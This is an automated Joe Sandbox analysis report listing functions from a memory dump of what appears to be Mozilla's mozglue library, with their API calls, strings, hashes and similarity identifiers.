String ID:
API String ID: 1192971331-0
Opcode ID: 61cf2f874bad6c4f4ea5e485d4eb8ed6a064ae1d7619db4743d175ba6b9ebb2d
Instruction ID: 430c96cd5c0c6f5b247d5cebaf0e15fec94c2638339c184eae21107c3987ff8a
Opcode Fuzzy Hash: 61cf2f874bad6c4f4ea5e485d4eb8ed6a064ae1d7619db4743d175ba6b9ebb2d
Instruction Fuzzy Hash: E33160B1A047448FDB00BFB9D68826EBBF0BF89705F01492DE98587311EB709959CB86

Function 6C659620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C659675
__Init_thread_footer.LIBCMT ref: 6C659697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6596E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C659707
__Init_thread_footer.LIBCMT ref: 6C65971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C659773

Part of subcall function 6C67AB89: EnterCriticalSection.KERNEL32(6C6CE370,?,?,?,6C6434DE,6C6CF6CC,?,?,?,?,?,?,?,6C643284), ref: 6C67AB94
Part of subcall function 6C67AB89: LeaveCriticalSection.KERNEL32(6C6CE370,?,6C6434DE,6C6CF6CC,?,?,?,?,?,?,?,6C643284,?,?,6C6656F6), ref: 6C67ABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6597B7
FreeLibrary.KERNEL32 ref: 6C6597D0
FreeLibrary.KERNEL32 ref: 6C6597EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C659824

Strings

ntdll.dll, xrefs: 6C6596E3
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C659670
MapViewOfFileNuma2, xrefs: 6C6597B1
NtMapViewOfSection, xrefs: 6C659701

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: 83a127fcd13d062e5ce17b923c9b4dda90587c56961a6598ff30f228128d8e72
Instruction ID: c3a310bee9aa81caa6d3403b10096dd7b2631f604a02b3535f576e3c5985bbc9
Opcode Fuzzy Hash: 83a127fcd13d062e5ce17b923c9b4dda90587c56961a6598ff30f228128d8e72
Instruction Fuzzy Hash: 9B41A0B17002059FDF00CFA6E8D4A9677B4EB4A758F108529ED1997740D730EA25CFBA

Function 6C653E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,?,?,?,?,6C653CCC), ref: 6C653EEE
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C653FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040,?,?,?,?,?,6C653CCC), ref: 6C654006
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6540A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C653CCC), ref: 6C6540AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C653CCC), ref: 6C6540C2
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C654134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C653CCC), ref: 6C654143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C653CCC), ref: 6C654157

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: 021ad61a6c52bfbff5daae3cc18e451e73a37ec012de685d168139a0da8ef5eb
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: 29A180B1A00215CFDB40CF28C880769B7B5FF48318F7541A9D909AF742D772E9A6CBA4

Function 6C699D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C698273), ref: 6C699D65
free.MOZGLUE(6C698273,?), ref: 6C699D7C
free.MOZGLUE(?,?), ref: 6C699D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C699E0F
free.MOZGLUE(6C69946B,?,?), ref: 6C699E24
free.MOZGLUE(?,?,?), ref: 6C699E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C699EC8
free.MOZGLUE(6C69946B,?,?,?), ref: 6C699EDF
free.MOZGLUE(?,?,?,?), ref: 6C699EF5

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 8ce465273d36f0f4f994ca77ecf7d2aae1d4180f0a82b5f273327537539c5a86
Instruction ID: 7fa9f00f009a5f3658e7c8488d18f8cd0d5eb088827c3ae78e4f38e7dd2c73c0
Opcode Fuzzy Hash: 8ce465273d36f0f4f994ca77ecf7d2aae1d4180f0a82b5f273327537539c5a86
Instruction Fuzzy Hash: 18718F70909B428FDB12CF19C48155BF3F4FF99319B449619E85E5BB12EB30E886CB89

Function 6C69DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C69DDCF

Part of subcall function 6C67FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C67FA4B

Part of subcall function 6C6990E0: free.MOZGLUE(?,00000000,?,?,6C69DEDB), ref: 6C6990FF
Part of subcall function 6C6990E0: free.MOZGLUE(?,00000000,?,?,6C69DEDB), ref: 6C699108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C69DE0D
free.MOZGLUE(00000000), ref: 6C69DE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C69DE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C69DEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C69DEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C68DEFD,?,6C654A68), ref: 6C69DF32

Part of subcall function 6C69DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C69DB86
Part of subcall function 6C69DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C69DC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C68DEFD,?,6C654A68), ref: 6C69DF65
free.MOZGLUE(?), ref: 6C69DF80

Part of subcall function 6C665E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C665EDB
Part of subcall function 6C665E90: memset.VCRUNTIME140(ewjl,000000E5,?), ref: 6C665F27
Part of subcall function 6C665E90: LeaveCriticalSection.KERNEL32(?), ref: 6C665FB2

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: e0e6b219726a3c8611bc1cebaadedec1a9a1bc0452b1de9563e1e89988a3b80e
Instruction ID: 4a9e4299a494900606a1032f7ad13b112acdb07137aa73eef214b656bc9d5c29
Opcode Fuzzy Hash: e0e6b219726a3c8611bc1cebaadedec1a9a1bc0452b1de9563e1e89988a3b80e
Instruction Fuzzy Hash: 6E51C2766016029BD7118B29C8806AEB3B2BF92308F95013DD81B53B01DB31F91BCB9E

Function 6C6A5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C6A5C8C,?,6C67E829), ref: 6C6A5D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C6A5C8C,?,6C67E829), ref: 6C6A5D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C6A5C8C,?,6C67E829), ref: 6C6A5D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C6A5C8C,?,6C67E829), ref: 6C6A5D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C6A5C8C,?,6C67E829), ref: 6C6A5DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C6A5C8C,?,6C67E829), ref: 6C6A5DC9
std::_Facet_Register.LIBCPMT ref: 6C6A5DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C6A5C8C,?,6C67E829), ref: 6C6A5E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C6A5C8C,?,6C67E829), ref: 6C6A5E45

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: 91bd51c5b3cf7bd7f155b7f3e6a36a4a2619ad776f5540495a8772ce6c682a29
Instruction ID: 21c5c61e5fa70851266fcae90f863b91bb5b7917017118a9d2b0d3d23bf5ad8b
Opcode Fuzzy Hash: 91bd51c5b3cf7bd7f155b7f3e6a36a4a2619ad776f5540495a8772ce6c682a29
Instruction Fuzzy Hash: 55414F707002059FCB10EFA6C8D8AAEB7F5EF89318F544069E50A97791DB34AD06CB69

Function 6C67CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C6431A7), ref: 6C67CDDD

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C67CFA4, 6C67CFB8
<jemalloc>, xrefs: 6C67CF9F, 6C67CFB3

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: e3cee3531851917d66592035d420d3ea60436c44ea1b0f1a5d6d67a50e8f2cfd
Instruction ID: fae2147e462b4d9f33682c7cde1691939078022cb6522795e96052e350498498
Opcode Fuzzy Hash: e3cee3531851917d66592035d420d3ea60436c44ea1b0f1a5d6d67a50e8f2cfd
Instruction Fuzzy Hash: 8E31A4307412056BEB20AF658C95BAE7B79AF81758F304815F612EBA80DB74D501CBBE

Function 6C64ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C64F100: LoadLibraryW.KERNEL32(shell32,?,6C6BD020), ref: 6C64F122
Part of subcall function 6C64F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C64F132

moz_xmalloc.MOZGLUE(00000012), ref: 6C64ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C64EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C64EDCC
CreateFileW.KERNEL32 ref: 6C64EE08
free.MOZGLUE(00000000), ref: 6C64EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C64EE32

Part of subcall function 6C64EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C64EBB5
Part of subcall function 6C64EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C67D7F3), ref: 6C64EBC3
Part of subcall function 6C64EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C67D7F3), ref: 6C64EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C64EDC1

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: 26dda25826e6ca7257d273b3aa3ac08bc74ec905daedba5a276c30a5e322ecec
Instruction ID: 49bdc6906f6899bafd576f0a776e0f5d1cbb3baf348ca44c1dfdb27eaa1bc421
Opcode Fuzzy Hash: 26dda25826e6ca7257d273b3aa3ac08bc74ec905daedba5a276c30a5e322ecec
Instruction Fuzzy Hash: 8451C071D052049BDB00DF68C8817EEF7F0AF5A318F44C92DE8556BB40E730A949CBAA

Function 6C6BA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6BA565

Part of subcall function 6C6BA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6BA4BE
Part of subcall function 6C6BA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6BA4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6BA65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6BA6B6

Strings

z, xrefs: 6C6BA6AE
0, xrefs: 6C6BA5FB

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 4b615eab6b7e9e13e39b262f16fb07c8143a006068823dbce26ef1834402d560
Instruction ID: 71ce6ef40224b81b926821717c7da3e14b3d061f514e5e7c3d80090b9337da68
Opcode Fuzzy Hash: 4b615eab6b7e9e13e39b262f16fb07c8143a006068823dbce26ef1834402d560
Instruction Fuzzy Hash: 0A4159B19087459FC341CF28C080A8BBBE4BFCA354F408A2EF49997651EB30D659CB86

Function 6C689420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C67AB89: EnterCriticalSection.KERNEL32(6C6CE370,?,?,?,6C6434DE,6C6CF6CC,?,?,?,?,?,?,?,6C643284), ref: 6C67AB94
Part of subcall function 6C67AB89: LeaveCriticalSection.KERNEL32(6C6CE370,?,6C6434DE,6C6CF6CC,?,?,?,?,?,?,?,6C643284,?,?,6C6656F6), ref: 6C67ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C654A68), ref: 6C68945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C689470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C689482
__Init_thread_footer.LIBCMT ref: 6C68949F

Strings

MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C689459
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C68947D
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C68946B

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 2ea20c894ae1eb4fa892207e3d32344e3f80751642d34eb9a927e3a786226b7b
Instruction ID: 7331dfdade97a8a91a182453fdcda4e6406f11a1713bcb185cb1f4f2d609d32d
Opcode Fuzzy Hash: 2ea20c894ae1eb4fa892207e3d32344e3f80751642d34eb9a927e3a786226b7b
Instruction Fuzzy Hash: 2D01F770B011018BD7109B6ED999A8933B5EF0632CF044537ED0AC6B52E63BEA658D7F

Function 6C64B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,6C64B61E,?,?,?,?,?,00000000), ref: 6C64B6AC

Part of subcall function 6C65CA10: malloc.MOZGLUE(?), ref: 6C65CA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C64B61E,?,?,?,?,?,00000000), ref: 6C64B6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C64B61E,?,?,?,?,?,00000000), ref: 6C64B6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C64B61E,?,?,?,?,?,00000000), ref: 6C64B70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C64B61E,?,?,?,?,?,00000000), ref: 6C64B71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C64B61E), ref: 6C64B73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,6C64B61E,?,?,?,?,?,00000000), ref: 6C64B760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C64B61E,?,?,?,?,?,00000000), ref: 6C64B79A

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: 37f59fa32f527363087a37fbda8d645a82cd934c9012eb6569a67bbbb3c908c8
Instruction ID: 4e6145e3e6f18174693162832ba20d2a547e48220552a92823f0b15893f70f42
Opcode Fuzzy Hash: 37f59fa32f527363087a37fbda8d645a82cd934c9012eb6569a67bbbb3c908c8
Instruction Fuzzy Hash: A44105B2D005159FCB00DF68DC806AFB7B9FF85324F258629E825E7780E731A91087E9

Function 6C6BB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C6BB5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C6BB5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C6BB5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C6BB5F4
__Init_thread_footer.LIBCMT ref: 6C6BB605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C6BB61F
std::_Facet_Register.LIBCPMT ref: 6C6BB631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6BB655

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 58968aaee6c0e62463f33af9de254e56ba4e9249e312f1ccc754148a8d089941
Instruction ID: d59f389e7800887fd571d15c18cf6ced5299a11081e43a867e9b20ae947c7a65
Opcode Fuzzy Hash: 58968aaee6c0e62463f33af9de254e56ba4e9249e312f1ccc754148a8d089941
Instruction Fuzzy Hash: EB318472B001058BCB10DF6AC8D49AEB7F5EBC6325F140515D916A7740DB30BA56CF9E

Function 6C686590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6C67FA80: GetCurrentThreadId.KERNEL32 ref: 6C67FA8D
Part of subcall function 6C67FA80: AcquireSRWLockExclusive.KERNEL32(6C6CF448), ref: 6C67FA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C686727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C6867C8

Part of subcall function 6C694290: memcpy.VCRUNTIME140(?,?,6C6A2003,6C6A0AD9,?,6C6A0AD9,00000000,?,6C6A0AD9,?,00000004,?,6C6A1A62,?,6C6A2003,?), ref: 6C6942C4

Strings

data, xrefs: 6C686593
vll, xrefs: 6C68696C

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data$vll
API String ID: 511789754-3754533099
Opcode ID: bf9ccd18c049f19d84b434c64b1875f0a91947db9aaf54fa0c5423ba2981a218
Instruction ID: 03a9351fa18a5583f158ae888529e959bb4c66581faa12b65f3f01a6a361a97a
Opcode Fuzzy Hash: bf9ccd18c049f19d84b434c64b1875f0a91947db9aaf54fa0c5423ba2981a218
Instruction Fuzzy Hash: D1D1DF74A093408FD724CF25C881B9EB7E1AFC6308F10492DE48997B51DB31E949CBAB

Function 6C67D5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C64EB57,?,?,?,?,?,?,?,?,?), ref: 6C67D652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C64EB57,?), ref: 6C67D660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C64EB57,?), ref: 6C67D673
free.MOZGLUE(?), ref: 6C67D888

Strings

Wdl, xrefs: 6C67D5D9, 6C67D63F
|Enabled, xrefs: 6C67D81E

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
